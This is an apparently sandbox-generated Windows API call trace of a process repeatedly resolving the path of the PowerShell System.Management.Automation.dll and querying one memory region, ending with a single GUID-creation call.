	[0101.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.643] VirtualQuery (in: lpAddress=0xebe30, lpBuffer=0xeccf0, dwLength=0x30 | out: lpBuffer=0xeccf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.645] VirtualQuery (in: lpAddress=0xebe30, lpBuffer=0xeccf0, dwLength=0x30 | out: lpBuffer=0xeccf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.648] VirtualQuery (in: lpAddress=0xebe30, lpBuffer=0xeccf0, dwLength=0x30 | out: lpBuffer=0xeccf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.648] VirtualQuery (in: lpAddress=0xebe30, lpBuffer=0xeccf0, dwLength=0x30 | out: lpBuffer=0xeccf0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0101.649] VirtualQuery (in: lpAddress=0xeb520, lpBuffer=0xec3e0, dwLength=0x30 | out: lpBuffer=0xec3e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.649] VirtualQuery (in: lpAddress=0xeb5b0, lpBuffer=0xec470, dwLength=0x30 | out: lpBuffer=0xec470*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.650] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.650] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.651] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.651] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.651] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.652] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.652] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.652] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.652] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.652] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.653] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.653] VirtualQuery (in: lpAddress=0xeb960, lpBuffer=0xec820, dwLength=0x30 | out: lpBuffer=0xec820*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.653] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.654] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.654] VirtualQuery (in: lpAddress=0xebc90, lpBuffer=0xecb50, dwLength=0x30 | out: lpBuffer=0xecb50*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.654] VirtualQuery (in: lpAddress=0xebd20, lpBuffer=0xecbe0, dwLength=0x30 | out: lpBuffer=0xecbe0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0101.654] CoCreateGuid (in: pguid=0xed510 | out: pguid=0xed510*(Data1=0x6fc2754, Data2=0x7c88, Data3=0x4af1, Data4=([0]=0xbb, [1]=0x48, [2]=0xc3, [3]=0xf, [4]=0xec, [5]=0xba, [6]=0x2b, [7]=0x77))) returned 0x0
